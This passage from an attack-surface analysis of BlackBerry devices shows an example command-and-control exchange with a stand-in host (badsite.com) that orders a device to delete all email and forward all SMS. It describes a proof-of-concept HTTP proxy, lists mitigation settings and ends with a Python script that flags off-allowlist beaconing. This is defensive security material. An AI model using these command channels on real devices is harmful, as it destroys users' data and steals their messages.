
Attack Surface Analysis of BlackBerry Devices
Application sends:
http://www.badsite.com/whatnow?
Web site returns:
COMMAND=DELETE_ALL EMAIL
COMMAND=FORWARD_ALL SMS TO 0865550456
Application sends:
http://www.badsite.com/whatnow?Status=Email+Deleted&Status=SMS+Forwarding+ON
HTTP Proxy
A malicious application could use the BlackBerry device to proxy HTTP traffic or contact Web servers with
predefined content. Typically, an HTTP proxy may be used to browse restricted, illegal or dubious Web sites,
or be utilized for denial of service attacks.
A proof-of-concept implementation used an HTTP StreamConnection object to connect to a remote Web site,
and then marshalled the returned data to a third party (who had a listener socket running on a specified
port) via a TCP socket StreamConnection object. Note that your network provider must support full internet
access from the BlackBerry in order for this to be functional.
Such attacks will be traced back to the individual or corporation that owns the BlackBerry rather than the
actual attacker.
Mitigation
You can set the following options to mitigate the attacks outlined above. See Mitigation Strategies for more
information.
IT Policy: "Allow External Connections" = False
Application Controls: "External Domains" = [list of allowed domains] or "External Network Connections" = Not Permitted
Device Firewall: Status = Enabled
Application Permissions: Connections > Carrier Internet = Deny
Other Device Settings
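A detection-side companion to the settings above, added here as an example and not taken from the original paper: it checks outbound device requests against an "External Domains"-style allowlist and flags the fixed-interval polling shown in the whatnow? exchange. The allowlist contents, device ids, log layout and thresholds are assumptions, and the log rows are constructed.

```python
import statistics
from collections import defaultdict
from urllib.parse import urlsplit

# Assumed allowlist, standing in for the "External Domains" setting.
ALLOWED_DOMAINS = {"example-corp.com"}

# Constructed sample log: (epoch seconds, device id, requested URL).
SAMPLE_LOG = [
    (1000, "dev-A", "http://www.badsite.com/whatnow?"),
    (1300, "dev-A", "http://www.badsite.com/whatnow?Status=Email+Deleted"),
    (1600, "dev-A", "http://www.badsite.com/whatnow?"),
    (1900, "dev-A", "http://www.badsite.com/whatnow?"),
    (1010, "dev-B", "http://mail.example-corp.com/inbox"),
    (1450, "dev-B", "http://notexample-corp.com/login"),
    (5200, "dev-B", "http://mail.example-corp.com/inbox"),
]

def domain_allowed(host, allowed=ALLOWED_DOMAINS):
    """Exact match or true subdomain; 'notexample-corp.com' must not pass."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)

def analyse(log, min_hits=4, max_jitter=0.1):
    """Return (off_allowlist, beacons) as sets of (device, host) pairs.

    off_allowlist: destinations outside the allowlist.
    beacons: those polled at least min_hits times at near-constant
    intervals (stdev of gaps <= max_jitter * mean gap).
    """
    times = defaultdict(list)
    for ts, device, url in log:
        host = urlsplit(url).hostname or ""
        if not domain_allowed(host):
            times[(device, host)].append(ts)
    beacons = set()
    for key, stamps in times.items():
        if len(stamps) < min_hits:
            continue  # too few requests to judge periodicity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if statistics.pstdev(gaps) <= max_jitter * statistics.mean(gaps):
            beacons.add(key)
    return set(times), beacons

if __name__ == "__main__":
    off, beacons = analyse(SAMPLE_LOG)
    print("off-allowlist:", sorted(off))
    print("periodic polling:", sorted(beacons))
```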